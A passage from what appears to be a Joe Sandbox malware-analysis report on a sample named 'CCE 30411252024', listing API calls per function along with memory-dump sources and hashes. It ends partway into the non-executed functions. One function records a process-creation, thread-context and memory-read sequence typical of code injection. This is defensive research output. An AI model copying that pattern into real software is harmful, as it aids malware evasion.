                                                                                          • Part of subcall function 00EE3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE3B08
                                                                                          • Part of subcall function 00EE3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EE3AA3,?), ref: 00EE3D45
                                                                                          • Part of subcall function 00EE3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00EE3AA3,?), ref: 00EE3D57
                                                                                          • Part of subcall function 00EE3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FA1148,00FA1130,?,?,?,?,00EE3AA3,?), ref: 00EE3DC8
                                                                                          • Part of subcall function 00EE3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00EE3AA3,?), ref: 00EE3E48
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EE3AB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 924797094-0
                                                                                        • Opcode ID: 3869b3688e2cfcb94f57d1434036d6dd738dcee1870d69dddf693f2de1ea32f7
                                                                                        • Instruction ID: ef5062680f21cd2f7838ccbc4c7b7ea847e0b9cd052be502154e486fd190bdee
                                                                                        • Opcode Fuzzy Hash: 3869b3688e2cfcb94f57d1434036d6dd738dcee1870d69dddf693f2de1ea32f7
                                                                                        • Instruction Fuzzy Hash: 6E11D2B1A083489FC310EF69EC0591AFBE8FF95350F01891EF585932B1DB709584DB92
                                                                                        Function 00F0E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00F0EA29
                                                                                        • __close_nolock.LIBCMT ref: 00F0EA42
                                                                                          • Part of subcall function 00F07BDA: __getptd_noexit.LIBCMT ref: 00F07BDA
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 1046115767-0
                                                                                        • Opcode ID: 63647e9cfb5fd5239e82e9a5eb5379cede5f7e6eb38a2db6878351eb7e6be47e
                                                                                        • Instruction ID: d1506b0a785a2545a53fed0441d1101d37d7c45a334b54acd040768ae0c62958
                                                                                        • Opcode Fuzzy Hash: 63647e9cfb5fd5239e82e9a5eb5379cede5f7e6eb38a2db6878351eb7e6be47e
                                                                                        • Instruction Fuzzy Hash: E611A9B2E057148AE721BF64DC413597A516F86331F164B80E4605F1E2CBBC9C50F6A5
                                                                                        Function 00EFF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F0395C: __FF_MSGBANNER.LIBCMT ref: 00F03973
                                                                                          • Part of subcall function 00F0395C: __NMSG_WRITE.LIBCMT ref: 00F0397A
                                                                                          • Part of subcall function 00F0395C: RtlAllocateHeap.NTDLL(01010000,00000000,00000001,00000001,00000000,?,?,00EFF507,?,0000000E), ref: 00F0399F
                                                                                        • std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                          • Part of subcall function 00F06805: RaiseException.KERNEL32(?,?,0000000E,00F96A30,?,?,?,00EFF538,0000000E,00F96A30,?,00000001), ref: 00F06856
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 3c9652f505523c11fc0944020c34fb82f1bc352bbd0f23cbf6f09b4008ebe0c1
                                                                                        • Instruction ID: 504a2d3da15db6a18dfc9f6b1bc3ef69584142a85f733ada6c7a05420130fbb6
                                                                                        • Opcode Fuzzy Hash: 3c9652f505523c11fc0944020c34fb82f1bc352bbd0f23cbf6f09b4008ebe0c1
                                                                                        • Instruction Fuzzy Hash: A0F0C23160421EA7DB04BF98DD019EE77ECAF00358F644025FA08E21C2DFB4DA41B6A5
                                                                                        Function 00F035E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        • __lock_file.LIBCMT ref: 00F03629
                                                                                          • Part of subcall function 00F04E1C: __lock.LIBCMT ref: 00F04E3F
                                                                                        • __fclose_nolock.LIBCMT ref: 00F03634
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: ac27fd83addbe1368a9d9e4fb722e9e4df6ef3850635a397e3c9ef70da73430a
                                                                                        • Instruction ID: afd6b50a0049559395ebe8d041b725a01ced221e355135c533c879668314f44a
                                                                                        • Opcode Fuzzy Hash: ac27fd83addbe1368a9d9e4fb722e9e4df6ef3850635a397e3c9ef70da73430a
                                                                                        • Instruction Fuzzy Hash: 77F0B472D41704AAEB217F65CC06B6E7AA46F40330F298108E420EB2D1CB7C9A01BF95
                                                                                        Function 01056F75 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 01057733
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010577C9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010577EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                        • Instruction ID: 5fa04d3191a18db67445ee6e74ad1857bc80b207f7eb29021630da2f02709915
                                                                                        • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                        • Instruction Fuzzy Hash: 7812DE24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                                        Function 00F02957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __flush.LIBCMT ref: 00F02A0B
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flush__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 4101623367-0
                                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                        • Instruction ID: 7903f6fb443389f21320762c5b7e0fc85284012ca6a199e7259307daaad7616c
                                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                        • Instruction Fuzzy Hash: 35418471B007069FDF688FA9C8895AE77A6AF44370B24852DE855C72C0EB74DD41BB60
                                                                                        Function 00EFED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 164614a1d80bad9c5246b33582ddff9999e25612ef09e0b5b48cc10533b7f1ec
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 7831EA70A00109DBC718DF28C480979F7A5FF49344B6496A5E509EBB65DB32FDC1CB80
                                                                                        Function 00F59A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 90e6dc9f310342cabd5169e8cd0484b2b2bf36874581254fdbd7316f5777714c
                                                                                        • Instruction ID: 32bea4227fc1f73a6aef87b731474608873af8f4ae67227fcbf456fe8b8b4708
                                                                                        • Opcode Fuzzy Hash: 90e6dc9f310342cabd5169e8cd0484b2b2bf36874581254fdbd7316f5777714c
                                                                                        • Instruction Fuzzy Hash: 9E415D70504655CFEB24DF18C444B2ABBE0BF85308F19999CEA9A5B362C372EC45DF52
                                                                                        Function 00EE41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EE4214: FreeLibrary.KERNEL32(00000000,?), ref: 00EE4247
                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EE39FE,?,00000001), ref: 00EE41DB
                                                                                          • Part of subcall function 00EE4291: FreeLibrary.KERNEL32(00000000), ref: 00EE42C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load
                                                                                        • String ID:
                                                                                        • API String ID: 2391024519-0
                                                                                        • Opcode ID: 6c8054ed69ff927d335e1d8c925325946821e87273b3cbeedb8799811049e0ec
                                                                                        • Instruction ID: 2dff72f86a3d85aa074423672adf444eaa3e0b4ca46a699617d3b2bdba4b0847
                                                                                        • Opcode Fuzzy Hash: 6c8054ed69ff927d335e1d8c925325946821e87273b3cbeedb8799811049e0ec
                                                                                        • Instruction Fuzzy Hash: 6211E7B160030AABCB10BB75DC16F9E77E99F44700F108429FA96BA1D1DB74DA04AB60
                                                                                        Function 00F59B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: e8d62bd40e552a8bfa1c26eb667fa3ad2d0a49f73c3b937253aeb0e16f697d11
                                                                                        • Instruction ID: dbc5b0532043dc21f8e678d8c61412a3a5ccc6dffe62984b061a82e293a7f065
                                                                                        • Opcode Fuzzy Hash: e8d62bd40e552a8bfa1c26eb667fa3ad2d0a49f73c3b937253aeb0e16f697d11
                                                                                        • Instruction Fuzzy Hash: CB213970508609CFDB24DF28C444B2ABBF1BF84308F14596CFA9A67262D732E845DF52
                                                                                        Function 00F0AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 00F0AFC0
                                                                                          • Part of subcall function 00F07BDA: __getptd_noexit.LIBCMT ref: 00F07BDA
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1144279405-0
                                                                                        • Opcode ID: 93ac559f995b420a31c8dad0a656a5987accb42be0100c87afe7ff4b573d7665
                                                                                        • Instruction ID: 3a4f920c20a56ddef456b85b01cc17d49052cff37d2a58f00622df9cabd1aa92
                                                                                        • Opcode Fuzzy Hash: 93ac559f995b420a31c8dad0a656a5987accb42be0100c87afe7ff4b573d7665
                                                                                        • Instruction Fuzzy Hash: E01182B2D057049BE7127FA4DC417593B619F81331F158680E4745F1E2DBB99D00BBA1
                                                                                        Function 00EE39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                        • Instruction ID: ba135d45a42b4d89b4332bc8782dd38037c84ea09cb77db416f29f2d62eb283e
                                                                                        • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                        • Instruction Fuzzy Hash: 4A01867150014DAECF04EFA5C8818FEBBB4AF11304F008125B526A71E5EA309A49EF60
                                                                                        Function 00F02AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00F02AED
                                                                                          • Part of subcall function 00F07C0E: __getptd_noexit.LIBCMT ref: 00F07C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: 1906923139ba6061332ae6d297eb222bc9866bd9657569b68fa95ff2923f0375
                                                                                        • Instruction ID: 0a7342a8a452ce7f701271ce68c77e638e28bb6c19dae18568f4c5b3277b8d77
                                                                                        • Opcode Fuzzy Hash: 1906923139ba6061332ae6d297eb222bc9866bd9657569b68fa95ff2923f0375
                                                                                        • Instruction Fuzzy Hash: 57F06271A00205AADF61BF64CC0A79F36A6BF40320F158415F414DA1D1DB7C8A62FB61
                                                                                        Function 00EE4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00EE39FE,?,00000001), ref: 00EE4286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 7b37b49e6dff2a35e7641fd8b86fa9267c0d9487a3f52456963c7a16bccf8dc0
                                                                                        • Instruction ID: 9dd1d8aeb1142755055d4683466885ee62c16513265aae5372e7a49b49be8efc
                                                                                        • Opcode Fuzzy Hash: 7b37b49e6dff2a35e7641fd8b86fa9267c0d9487a3f52456963c7a16bccf8dc0
                                                                                        • Instruction Fuzzy Hash: B8F0A0B0504346CFCB348F62E884812B7E4BF083193249A7EF2D692560C3719940DF40
                                                                                        Function 00EE40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EE40C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: 9da6de72c1d1ff84a86aa628b6bc00ac5e0ac0201de83ea905012b589ae17471
                                                                                        • Instruction ID: 055361a122b6ac567b982209e75fa6824c576a52d1c2bc62e93cecbc93c77185
                                                                                        • Opcode Fuzzy Hash: 9da6de72c1d1ff84a86aa628b6bc00ac5e0ac0201de83ea905012b589ae17471
                                                                                        • Instruction Fuzzy Hash: 07E0C236A002285BC721A659DC46FEE77EDDF886A0F0940B5F909E7244DAA4A981A690
                                                                                        Function 01057F78 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 01057F89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2160099918.0000000001055000.00000040.00000020.00020000.00000000.sdmp, Offset: 01055000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1055000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: 058ecf1af591f1be9f0a72bd976148d1942cb652dfbbca1a4b8fd06ae194951b
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 21E0E67494410DDFDB00DFB8D5496EE7BB4EF04301F1001A1FD05D2280D6309D609A62

                                                                                        Non-executed Functions

                                                                                        Function 00F4F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00F4F87D
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4F8DC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F4F919
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4F940
                                                                                        • SendMessageW.USER32 ref: 00F4F966
                                                                                        • _wcsncpy.LIBCMT ref: 00F4F9D2
                                                                                        • GetKeyState.USER32(00000011), ref: 00F4F9F3
                                                                                        • GetKeyState.USER32(00000009), ref: 00F4FA00
